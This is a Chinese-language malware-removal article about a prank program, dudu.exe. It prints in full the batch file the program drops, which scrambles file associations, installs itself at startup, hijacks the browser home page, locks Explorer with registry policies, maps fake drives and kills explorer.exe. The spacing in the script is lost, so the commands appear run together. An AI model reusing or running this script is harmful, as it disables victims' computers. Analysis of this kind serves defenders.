恶作剧程序dudu.exe清除解决方案

dudu.exe运行后，当前用户临时文件夹中释放一个bt0577.bat批处理文件。这是个恶作剧程序。想办法阻止此.bat运行，用记事本打开该文件，可以看到下列内容：

@echooff

assoc.txt=exefile

assoc.exe=txtfile

assoc.htm=exefile

assoc.html=exefile

assoc.com=txtfile

assoc.gho=txtfile

assoc.rar=txtfile

assoc.zip=txtfile

assoc.chm=txtfile

assoc.jpg=txtfile

assoc.doc=exefile

assoc.ppt=txtfile

assoc.vbs=txtfile

assoc.cmd=txtfile

assoc.bmp=txtfile

assoc.gif=txtfile

assoc.ico=txtfile

assoc.png=txtfile

assoc.jpeg=txtfile

assoc.jpe=txtfile

assoc.jfif=txtfile

assoc.fla=txtfile

assoc.swf=txtfile

assoc.avi=txtfile

assoc.mov=txtfile

assoc.asf=txtfile

assoc.wmv=txtfile

assoc.rm=txtfile

assoc.ra=txtfile

assoc.mvb=txtfile

assoc.flv=txtfile

assoc.mpg=txtfile

assoc.wav=txtfile

assoc.mpeg=txtfile

assoc.mp3=txtfile

assoc.mp4=txtfile

assoc.3gp=txtfile

assoc.3g2=txtfile

assoc.dat=txtfile

assoc.msi=txtfile

assoc.bat=txtfile

copy%0"%windir%system32"

copy%0"%systemdrive%"

copy%0"%userprofile%「开始」菜单程序启动*.*"

regadd"HKEY_CURRENT_USERSoftwareMicrosoftInternetExplorerMain"/v"Start

Page"/treg_sz/dhttp://www.xiaowo.net/f

regadd"HKEY_CURRENT_USERSoftwareMicrosoftInternetExplorerMain"/v

"Default_Page_URL"/treg_sz/dhttp://www.xiaowo.net/f

regadd

HKEY_CURRENT_USERSOFTWARWMicrosoftWindowsCurrentVersionPoliciesExplorer/v

NoFind/tREG_DWORD/d1/f

regadd

HKEY_CURRENT_USERSOFTWARWMicrosoftWindowsCurrentVersionPoliciesExplorer/v

NoRun/tREG_DWORD/d0/f

regadd

HKEY_CURRENT_USERSOFTWARWMicrosoftWindowsCurrentVersionPoliciesExplorer/v

NoClose/tREG_DWORD/d1/f

regadd

HKEY_CURRENT_USERSOFTWARWMicrosoftWindowsCurrentVersionPoliciesExplorer/v

HideClock/tREG_DWORD/d1/f

regadd

HKEY_CURRENT_USERSOFTWARWMicrosoftWindowsCurrentVersionPoliciesExplorer/v

StartMenuLogOff/tREG_DWORD/d1/f

regadd

HKEY_CURRENT_USERSOFTWARWMicrosoftWindowsCurrentVersionPoliciesExplorer/v

nodrives/tREG_DWORD/d60/f

substb:C:

substh:C:

substi:C:

substj:C:

substk:C:

substl:C:

substm:C:

substn:C:

substo:C:

substp:C:

substq:C:

substr:C:

substs:C:

substt:C:

substu:C:

substv:C:

substw:C:

substx:C:

substy:C:

substz:C:

taskkill/imexplorer.exe/f

regadd

HKEY_CURRENT_USERSOFTWARWMicrosoftWindowsCurrentVersionPoliciesExplorer/v

NoFolderOptions/tREG_DWORD/d1/f

regadd

HKEY_CURRENT_USERSOFTWARWMicrosoftWindowsCurrentVersionPoliciesExplorer/v

NoViewContextMenu/tREG_DWORD/d0/f

regadd

HKEY_CURRENT_USERSOFTWARWMicrosoftWindowsCurrentVersionPoliciesExplorer/v

NoWinKeys/tREG_DWORD/d1/f

——————————————————————

如果bt0577.bat运行了，资源管理器进程被结束，用户只有一个空桌面可看了；文件关联被改得乱七八糟；三键调出任务管理器，?重新启动资源管理器，用资源管理器查看，可见硬盘分区增加n个其实并未增加（可用PQ核实）。

此程序不能穿透影子。如果在影子中运行从恶作剧程序，重启一下就OK了。

【恶作剧程序dudu.exe清除方法】相关文章：

★ 发现ravmsmon.exe病毒的清除方法

★ Hidden object的清除方法

★ wuaucll.exe(driver.exe)的查杀办法

★ wincfgs.exe病毒清除方法

★ mdesvc.exe后门查杀方法图文

★ 关于rundl132.exe vidll.dll LOGO1.exe 的清除方法

★ avwghmn.dll svchost.exe病毒删除方法

★ 灰鸽子引起的多个IEXPL0RE.EXE的清除方法

★ login.exe HGFS木马下载器的手动查杀方法

★ 水牛(shuiniu.exe)手工查杀方法不用专杀工具